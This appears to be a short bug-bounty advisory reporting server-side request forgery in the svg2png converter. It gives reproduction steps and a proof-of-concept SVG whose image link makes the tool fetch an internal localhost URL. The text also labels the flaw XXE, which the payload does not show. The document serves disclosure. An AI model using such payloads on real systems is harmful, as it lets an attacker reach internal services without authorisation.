Server-Side Request Forgery (SSRF) in sterlp/svg2png

2021-01-2800:00:00

b1nslashsh

www.huntr.dev

svg conversion vulnerability

ssrf

xxe

java 8 required

EPSS

0.001

Percentile

37.3%

JSON

:book: Description

Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No “Web Service” needed, just an executable JAR file. this package is vulnerable to (XXE).

https://github.com/sterlp/svg2png

:recycle: Steps To Reproduce-:

download and run latest release from https://github.com/sterlp/svg2png/releases
You have to have Java 8 installed on your PC
creat a payload svg or use : (this is a example of SSRF )https://drive.google.com/file/d/1jGhUXepvOV9bs_aaCThSmqloY_C1Nsj4/view?usp=sharing

rc3.svg

&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;
&lt;svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200"&gt;
&lt;image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg" stroke-width="1" id="image3204" /&gt;
&lt;rect x="0" y="150" height="10" width="300" style="fill: black"/&gt;
&lt;/svg&gt;

POC

gdrive

💥 Impact

SSRF

EPSS

0.001

Percentile

37.3%

JSON

Related for 1-OTHER-SVG2PNG